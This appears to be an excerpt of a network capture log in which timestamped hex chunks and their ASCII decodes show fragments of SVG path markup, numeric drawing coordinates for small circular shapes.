                                                                                                                                                                              2023-09-15 05:27:43 UTC3331INData Raw: 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37
                                                                                                                                                                              Data Ascii: 1,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77
                                                                                                                                                                              2023-09-15 05:27:43 UTC3347INData Raw: 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31
                                                                                                                                                                              Data Ascii: 2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81
                                                                                                                                                                              2023-09-15 05:27:43 UTC3363INData Raw: 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: ,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3
                                                                                                                                                                              2023-09-15 05:27:43 UTC3379INData Raw: 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64
                                                                                                                                                                              Data Ascii: 2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d
                                                                                                                                                                              2023-09-15 05:27:43 UTC3395INData Raw: 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c
                                                                                                                                                                              Data Ascii: 1a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3411INData Raw: 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                              Data Ascii: 5,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3427INData Raw: 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                              Data Ascii: 71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class=
                                                                                                                                                                              2023-09-15 05:27:43 UTC3443INData Raw: 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35
                                                                                                                                                                              Data Ascii: 2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M5
                                                                                                                                                                              2023-09-15 05:27:43 UTC3459INData Raw: 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c
                                                                                                                                                                              Data Ascii: .22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3475INData Raw: 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e
                                                                                                                                                                              Data Ascii: 8"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3491INData Raw: 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                              Data Ascii: 8.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3507INData Raw: 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: .87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1
                                                                                                                                                                              2023-09-15 05:27:43 UTC3523INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c
                                                                                                                                                                              Data Ascii: 7,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3539INData Raw: 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c
                                                                                                                                                                              Data Ascii: .36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3555INData Raw: 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35
                                                                                                                                                                              Data Ascii: 65,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.5
                                                                                                                                                                              2023-09-15 05:27:43 UTC3571INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0
                                                                                                                                                                              2023-09-15 05:27:43 UTC3587INData Raw: 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34
                                                                                                                                                                              Data Ascii: 2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14
